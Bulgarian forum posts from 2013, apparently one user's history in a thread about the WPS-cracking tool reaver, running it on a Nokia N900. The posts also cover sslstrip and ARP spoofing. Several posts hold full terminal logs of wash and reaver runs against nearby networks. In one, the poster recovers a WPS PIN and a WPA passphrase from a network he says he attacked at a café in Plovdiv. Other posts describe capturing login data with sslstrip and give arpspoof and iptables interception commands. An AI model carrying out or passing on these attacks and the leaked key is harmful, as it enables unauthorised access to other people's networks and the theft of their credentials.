1
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: May 10, 2013, 11:19
|
Здравей Remotex,благодаря за програмката и най-важното за написаното на смилаем Бг.език пояснение за ядрата и нишките. публикувано от Gat3way Също така и нямам намерение да се изхранвам с писане на мобилни приложения, имам си друга, съвсем различна работа и това е по-скоро отскорошно хоби. Gat3way,най-малко аз искам да ти дам наклон в каква посока да върви живота ти човек,просто исках да кажа това само като инфо,нищо повече. публикувано от Gat3way Нокия няма да си взема, па макар и с нормален линукс отгоре. Живеем в демократичен свят,и аз уважавам избора ти Благодаря и двама ви за подорбните обяснения,макар че ако трябва да бъда искрен със себе си,повечето от процесите които вие описвате на нормален потребител,му звучат като попаднъл на изпит по висша мтематика,а пък той знае само таблицата за умножение(говоря за себе си).Това ми напомня колко човек трябва да се рови и чете,за да проумее едва няколко % от това което вие обсъждате,но какво да се прави майката му е труд,а не чупки в кръста и гюбеци
|
|
|
2
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: May 09, 2013, 20:02
|
Здравей Gat3way,sorry че не съм писъл отдавна но нали знаеш като си купиш на старо някоя машина проблемите изкачат един след друг,нещо подобно както Дянков и валутният резерв. Относно твоето приложение,наистина доста е различно от другите,защото в маркета поне аз подобно не видях(на моята н900,имам 2 OS droid 2.3.4)въпроса е доколко хората се интересуват от инфо относно безжичните връзки които ги заобикалят.
Иначе за ако можеш да изолираш "тъй-наречените пречещите AP"ще бъде наистина голям успех. Но мисля че тука буквално трябва да си прекомпилираш собствено ядро,за тези екстри.
Чудя се защо не си вземеш една нокиа н900,безтуй забелязвам че стихията ти е security testing,а този тел.(по точно таблет)има какво да ти предложи, а и има серизона подкрепа от linux ентусиасти,които да ти кажа много добре сърфират през безбрежният океан от linux world,но в крайна сметка ти имаш крайната дума.
Не знам доколко човек може да печели от development applications,защото аз не разпологам с такъв умствен капацитет,но имам 1 приятел който се занимава с правене на сайтове по поръчка(мисля че работи на php)той ми сподели че наистина не се лишава от нищо,а неговата душа граби с пълни шепи от живота.
Относно рекламата,ако наистина приложението ти добие някаква популярност(дано да се получи)те сами ще те потърсят.
В последно време,споря с 1 луд фен на тема хардуер(тука съм като индианец в макдоналдс)и софтуер,за това колко са физични и виртуални ядра в процесорите.Преди време бях срещнал едо мнение относно точно тези метафорични явления.
Та този експерт споделя че всъщност 4 ядрен процесор(говоря за мобилни такива)не са 4 ядра,а само 2,но в самият чип има повече нишки(тука вече забравих точното определение)и когато софта праща заявки за повече ресурси,тези нишки разделят ядрата на 2-реални+още 2 виртуални,специално ставаше дума за samsung galaxy s3 и samsung galaxy s4 и въобще за чипове в мобилни телефони
Знам че андроид ядрото е основано на linux kernel,(не е зле Torvalds да си поиска,обезщтетение от всички компании които го използват+iphone,тъй-като те ползват част от кода му)и тука идва забвната част.
Следователно ако софта прекалено натовари харда и тези прословути нишки започнат да функционират,това не става ли като предварително е зададено от кернела,защото кернела е софт,но без него харда е само става само за витрината.И тука стана един спор,все едно сме на предизборна кампания с този фен(мани,мани буквално ако бяхме в лице в лице направо щяхме да се смесим).
Ти човек,а и останалите в този форум сте доста навътре относно linux kernels,въобще логически като се замислиш вярно ли това(става дума за физичните и виртуалните ядра и дали в кернела е зададено по подразбиране за тези нишки)или този фен се е оказa прав че няма нищо вярно в тази теория. Ще се радвам много,да чуя ваште мнения
|
|
|
3
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: Apr 26, 2013, 15:48
|
оргинално публикувано от ApucTokpaT TP-link са най-уязвими от към wps атаки -не създават никакви проблеми.В последно време обаче се напълни с мрежи на m-tel ,с които имам 0 % успеваемост интересува ме някой дали може да даде качествен линк с хардуера ,който използват ,благодаря предварително! Здравей човек и мерси за инфото,моят рутер е TP-link но е доста стар,и не поддържа wireless security setup(wps),а относно m-tel мрежа досега не съм срещал да пробвам да разбия. Gat3way,наскоро се закрастих отново да експериментирам относно сигурноста на протоколите(http,https,hsts)макар основният е http.След няколко опита с mozilla version 20.0.1(под proxy),успях без проблеми да си презапиша mail accounts от е-bay,paypal,hotmail,yahoo,bet365 като стартирам атаката чрез телефона и атакувам лаптопа си(докопах 1 msi) на порт 443(https)но gmail и twitter упорито отказват,директно ме прехвърлят на https,впрочем за twitter се показва надписа "warning try to redirect to http://www.twitter.com"но след като дам съгласието си,така и не може да се справи да прехвърли на http,макар че основната роля на sslstrip e точно това,да задържи протокола какъвто и е подаден чрез команда(дано да не бъркам).Странното е че след като изтрия mozilla и после пак я инсталирам 1 опит е успешен,независимо от кой сайт искам да взема някакви данни.После като порових открих тези 2 мнения за gmail и twitter "Both use HSTS headers now, so if you're using a browser that supports them (like Chrome,or firefox),there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem." и 2-то: "HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC." Накрая намерих това https://www.owasp.org/index.php/HTTP_Strict_Transport_SecurityТи имаш някакви наблюдения основно за mozilla говоря,а и да те попитам нещо друго,не знам дали това не е в сферата на фантастиките но,ако имаше някакъв софт който само чрез да cap file извлечен чрез handshake да може да вириуализира паролата щеше да бъде невероятно,един вид да се обезмисли използването на речник note:ако искаш прехвърли темата някъде другаде тъй-като тука говорим за протоколи а пак все заглавието на темата е за reaver
|
|
|
4
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: Apr 22, 2013, 09:33
|
Здравей Gat3way,колкото можах прочетох с моят оскъден english твоят линк,наистина похвално е че този човек,е направил това с този куц кон(dorid),но както казва самият той софта му е много ранна фаза,и споменава че на кадъра които е постнал не се забелязва monitor mode,мисля че ако се намери достатъчно поддръжници(donors)това което би искал да види като завършена весия на неговият софт ще бъде направено.Относно това което казваш за reaver e доста новаторско,досега никой не е споменавал за този вариант,не знам дали ще се полчи под python,защото python разполога с ресурс да изчислява доста бързо,иначе е страшно ефектно с 1 тел.както си запяш небрежно и му вземаш паролата(wep),говоря от личен опит.Не е зле да качиш твойта програма в google play,да видиш отзивите,за батерията и хакването в повечето случай специално за reaver,батерията не може да дочака заветният момент на появяването на дългоочакваната парола. оргинално публикувано от ApucTokpaT Ммм ,тънък момент... Това пък за какво... оргинално публикувано от Gat3way Рутери като например Netgear-ските, които слагат rate limit на WPS опитите също трябва да се вземат под внимание . Да си чувал тази екстра дали я има под tp-link
|
|
|
5
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: Apr 21, 2013, 16:30
|
оргинално публикувано от Gat3way Обаче мисля, че ти имаш предвид това което ти вади "wash". Да, там няма да се види - защото то ти изкарва само АП-тата, които подръжат WPS, останалите се игнорират (reaver така или иначе не може да работи срещу тях). Да,това имах предвид оргинално публикувано от Gat3way Reaver няма как да направи разлика между това дали рутера те е отрязал заради прекалено много опити за единица време (rate limiting) или защото му е забранен WPS по време на атаката - за него и двете изглеждат по един и същ начин . Прав си,но това ме навежда на мисълта че рутера може сам да се сезира когато го атaкуват което ми звучи абсурдно,не вярвам да има такъв рутер,или поне аз не съм срещал такъв оргинално публикувано от Gat3way Вярно е, а и допълнително е вярно че дори да бяха по-читави драйверите в андроидското ядро, ако нямаш root права, трудно ще направиш каквото и да било. Има custom rom-ове, които решават подобни проблеми, но това не е толкова приятно. Все пак има начин - дори без да root-ваш телефона, стига да имаш USB OTG подръжка (всички нови телефони/таблети го подържат), OTG кабел и USB wifi адаптер, който е с realtek-ски чипсет - едни пичове са хванали и са пренаписали целия realtek-ски драйвер в userspace, използвайки достъпната USB функционалност на андроида - и там могат да вкарат външното wifi в monitor mode и да слухтят трафик и да го запазват в pcap формат. Още не съм го изтествал - засега имам OTG кабела, но не съм си взел USB wifi адаптера . Не знам,за 1 път го чувам това,дали обаче като стартираш външen USB wifi адаптер,чрез usb port,кернела ти ще може да работи в мониторинг режим,аз не съм много надълбоко в linux world,но така мисля оргинално публикувано от Gat3way Ще съм много задължен ако направиш един експеримент и споделиш резултата: след като вземеш BSSID-тата с wash, забрани monitor mode-a (airmon-ng stop mon0) и пробвай пак с reaver. Така ще сме напълно сигурни че monitor mode не трябва за WPS атаката с reaver, което би било добра новина Няма как да пробвам от pc(сестра ми се бори на живот и смърт за нейният лаптоп,моят сдаде багажа сега се оглеждам за друг),а и колегата го е направил вече,но от тел.мога: по твоят вариант: BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands. ~ $ cd MyDocs/wl1251-maemo/binary/compat-wireless/ ~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot Root shell enabled BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands. /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s h /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit ~/MyDocs/wl1251-maemo/binary/compat-wireless $ root BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands. Nokia-N900:~# airmon-ng start wlan0 BusyBox v1.21.0 (Debian 1.21.0power2) multi-call binary. Usage: ps Show list of processes w Wide output l Long output T Show threads Interface Chipset Driver wlan0 TI WL1251 wl12xx - [phy0] (monitor mode enabled on mon0) Nokia-N900:~# wash -i mon0 -C -s Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- 64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE 28:10:7B:ED:68:DC 11 -71 1.0 No su F8:D1:11:41:2F:3C 6 -88 1.0 No setfani ^C Nokia-N900:~# airmon-ng stop mon0 Interface Chipset Driver wlan0 TI WL1251 wl12xx - [phy0] mon0 TI WL1251 wl12xx - [phy0] (removed) Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> [-] Failed to initialize interface 'wlan0' [-] Failed to recover WPA key в monitor mode wlan0: Nokia-N900:~# exit ~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot Root shell enabled BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands. /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh unload .sh /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit ~/MyDocs/wl1251-maemo/binary/compat-wireless $ root BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands. Nokia-N900:~# ifconfig wlan0 down Nokia-N900:~# iwconfig wlan0 mode Monitor Nokia-N900:~# ifconfig wlan0 up Nokia-N900:~# wash -i wlan0 -C -s Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- 64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE F8:D1:11:41:2F:3C 6 -88 1.0 No setfani 74:EA:3A:C5:A4:F4 9 -85 1.0 No TP-LINK_Blizoo 28:10:7B:ED:68:DC 11 -72 1.0 No su 00:11:6B:47:66:C6 11 -91 1.0 No WBR-6002 ^C Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> [?] Restore previous session for 64:70:02:B6:51:08? [n/Y] n - Waiting for beacon from 64:70:02:B6:51:08
[!] WARNING: Failed to associate with 64:70:02:B6:51:08 (ESSID: Cvetarski magazin GULCHE) ^C това е нормално защото спрях wireless drivers
без никакъв мониторинг режим,просто с super user: Nokia-N900:~# exit ~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot Root shell enabled
BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands.
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s h /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit ~/MyDocs/wl1251-maemo/binary/compat-wireless $ root
BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash) Enter 'help' for a list of built-in commands.
Nokia-N900:~# wash -i wlan0 -C -s
Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> [X] ERROR: Failed to open 'wlan0' for capturing Nokia-N900:~#
|
|
|
6
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: Apr 21, 2013, 12:59
|
Здравей Gat3way,не искам да навлизам в бурни дебати относно reaver,но ... оргинално публикувано от Gat3way Тя налага да си в обхвата на рутера логично оргинално публикувано от Gat3way Процентите не мърдат от 0%, просто защото WPS е изключен Грешка,ако е изключен WPS,няма как да го видиш в мониторинг режим,камо ли да предава пакети.Пак повтярям това е бъг на reaver,след стартиране на атаката,след приема на около 15%,просто изписва надписа rate "limiting detected" ако сте стартирали атаката с опцията -vv Прилагам и обяснение от самият автор,ето линк http://code.google.com/p/reaver-wps/wiki/FAQ със особено внимание под надписа: I get a warning "rate limiting detected", over and over again=lock wps Относно reaver съм си правил доста експерменти,пробвал съм със всички опции но до ден дешен това с заключен wps,няма лек,Битуват разни мнения,че ако се стартират няколко вида атаки по 1 цел "рутер" рутера накрая се рестартира,оприличават го като атака със спам или sms bomb при който устройство се преторварва от исканите заявки,и се рестатира само с цел нормализиране на работата си.Преди време четох мисля че беше твое менение Gat3way,относно предаване и утройство на рутери,доколкото помня всичко беше основано на математика и на някакви случайни числа(дано да не бъркам,изпита по математика си го взимах като пълних бутилката с газ на преподавателката за моя сметка)тъй-като повечето софт(security testing) който е сътворен от девлоперите е основан на тази прословута математика,повтарям възможно да се рестартира рутера сам,но аз поне не съм го видял на живо. оргинално публикувано от Gat3way защото няма как да вкараш wifi чипа в monitor mode и да слухтиш фреймове като хората Мисля че затова са виновни хората създали ядрото(кернела) на дроида,между другото дроид е най-куцият тел.за изпълнение на такива хватки оргинално публикувано от Gat3way Но пък идеята да имаш reaver на телефона си, при това без да се налага да го root-ваш, е забавна Аз имам този софт близо година и половина на моят тел.(нокиа н900),давам ви пример какво представлява под н900: ~ $ sudo gainroot Root shell enabled BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash) Enter 'help' for a list of built-in commands. /home/user # cd MyDocs/wl1251-maemo/binary/compat-wireless/ /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.sh /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit~ $ root BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash) Enter 'help' for a list of built-in commands. Nokia-N900:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 TI WL1251 wl12xx - [phy0]sleep: invalid number '1s' (monitor mode enabled on mon0) Nokia-N900:~# wash -i mon0 -C -s Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- 70:71:BC:1B:A4:02 1 -82 1.0 N 5f6abc 00:11:6B:47:58:2A 1 -90 1.0 N Webster ^C Nokia-N900:~# reaver -i mon0 -b 70:71:BC:1B:A4:02 -d 0 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> - Waiting for beacon from 70:71:BC:1B:A4:02
- Associated with 70:71:BC:1B:A4:02 (ESSID: 5f6abc)
- 0.01% complete @ 2012-02-29 11:38:56 {46 second(s)/pin}
- 0.01% complete @ 2012-02-29 11:39:23 {73 second(s)/pin}
- 0.01% complete @ 2012-02-29 11:39:53 {103 second(s)/pin}
- 0.01% complete @ 2012-02-29 11:40:19 {129 second(s)/pin}
- 90.91% complete @ 2012-02-29 11:41:03 {86 second(s)/pin}
- 90.93% complete @ 2012-02-29 11:41:34 {51 second(s)/pin}
- 90.93% complete @ 2012-02-29 11:42:02 {58 second(s)/pin}
- 90.94% complete @ 2012-02-29 11:42:32 {52 second(s)/pin}
- 90.95% complete @ 2012-02-29 11:42:57 {47 second(s)/pin}
- 90.95% complete @ 2012-02-29 11:43:28 {45 second(s)/pin}
- WPS PIN: '12345670'
- WPA PSK: '227490756'
- AP SSID: '5f6abc'
Nokia-N900:~# Атаката е направих,в Пловдив в кафето до ПУ,не помня как се казваше но беше на 2 етажа оргинално публикувано от Gat3way можеш да ползваш wlan интерфейса вместо mon интерфейса за експериментите с Reaver Става но по принцип reaver е настроена да работи с интерфейс mon0,осезателна разлика няма
|
|
|
7
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“
|
-: Apr 21, 2013, 09:31
|
публикувано от gat3way Това ми напомня на онази книжка за тайните дневници на Елена Чаушеску. Дори точния абзац изрових от нета. Там става въпрос че другарката развива "научна" дейност в румънската академия на науките. Там се занимава с важни експерименти от сорта на Не мога да проумея,на какво се дължи този сарказъм,или това е градивна критика подплътена солидно с доза английски хумор тип Джейн Остин "Гордост и Предразсъдъци" Gat3way ако има нещо да споделиш по темата ще се радвам да го чуя,но не по-този начин
|
|
|
8
|
Хумор, сатира и забава / Живота, вселената и някакви други глупости / За reaver из темата „Free distributed WPA PSK cracker“
|
-: Apr 18, 2013, 12:15
|
публикувано от ApucTokpaT Ама и той и нов да е ,като се заключи WPS ,ще го свали когато падне таванът на лятното кино...Рийвър не е панацея и той е зависим от определени фактори ,така както еъркрака. Напълно си прав,това е някакъв бъг,който reaver има,независимо от версията.Пробвах като стартирам raver и като заключи WPS,веднага стартирам от друг терминал aireplay-ng за handshake,въпреки че успявам да получа handshake,% не мърдат от 0,единствено трика е да се рестартира рутера,но поне аз не знам досега да може рестартира рутер дистанционно.
|
|
|
9
|
Сигурност / Системна Сигурност / Re: Блокиране на facebook
|
-: Feb 05, 2013, 16:20
|
Здрвейте фенове на линукс,един въпрос само.Имам 2 лаптопа в къщи,наскоро научих че чрез iptables,мога да пренасоча трафика,или да блокирам трафика към определн сайт.Опитвам се да си блокирам достъпа до фейса на единият лаптоп чрез другият,командите които намерих са: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -I PREROUTING -m tcp -p tcp -d http://www.facebook.com --dport 443 -j DROP arpspoof -i wlan0 192.168..... проблема е че отново имам достъп до фейса,някакви идеи edit:имам инсталиран backtrack5 r3
|
|
|
|